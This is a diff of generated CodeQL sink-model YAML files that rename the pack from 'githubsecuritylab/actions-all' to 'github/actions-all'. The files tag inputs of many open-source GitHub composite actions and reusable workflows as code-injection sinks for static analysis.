+++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 7175dd9450b4..035e331a007f 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index dca0f00a4ec8..1cf431a75736 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 5f75d4fd0cd2..669d7f443b13 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index d34a6a1a3885..b53f09499031 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index b7c5f7e214c1..4e9af4a1a8eb 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index eead3b5ace31..3fd31a3612fa 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index be7043cfdbfc..090bf1afc851 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 36bdef9ad9ae..47afbc44f765 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 3d66b07df9f1..4e173c717e57 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 2f8a3fbdfa6f..8091471b3c03 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e1acb54c7247..a3b3a5624c1e 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 0a51c7087996..22264f3f29f9 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 0ee56c05777d..e33a45e698ba 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index f17216cf1e8c..a2d5e1ef7a33 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 551010c6634d..e0ae2bc70bdb 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index bd64e336c171..7926fa4e083e 100644 
--- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 7d5454518675..2369c82bcb7a 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 1ad4a2b824df..d388b1a55b31 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index 60381d41f16b..dade6e8c958a 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index ac61ed797d52..9ac87054f10a 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 7eed41f755ed..3f9f3f632070 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index f977f6a5cce1..aff068890ad4 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index c4bacdc9c2c7..0304e585bb6f 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f4ee49207979..46950d380cbb 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 5fae95e5defb..2e3c2530ebae 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 4115d6c98f71..58f3d831423d 100644 
--- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 536b37131c17..dfa20e1f9d74 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 54f72118d870..144c4e456dc1 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index bed9ae53110e..51348fb1b565 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 7e9f4e14e857..c3fa787b2887 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 3a16fc74bb68..9845c089b322 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 686f1013dd81..2986040e8cd6 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 6a6cb61c1745..7dafcd5b71bc 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 513cd4d76446..1b5fb0e1d970 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 2855a6d4e01d..28ec54f1d9dd 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 78a2cc4e0ced..21f35339952a 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 8db73d2fc779..594b0cc9bb99 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 8b0deda070d9..a2fbd510bb29 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 3f7a7e7fda80..927cbd449e35 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 9746a1186913..52037a671cf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index 6208645b1b7b..b71a87193b68 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index e66e7326701e..24361a7d29eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 471ce3a672a9..be71c38f1242 100644 
--- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 1af30be9f358..889edaac1bba 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index ee3d9d0a8eff..b2b970152de6 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 493594e3b81a..f885a44f46e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index a437581ba83a..10f06693d26a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 489e005cc0ec..43d0fe1c2ce6 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3a0e723e9f70..4fb13f0a18cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 893be8a27259..96b73aa06de6 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 75877fa48aa7..554974bfe6f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 489e6134eba4..f1c6ec345d19 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml 
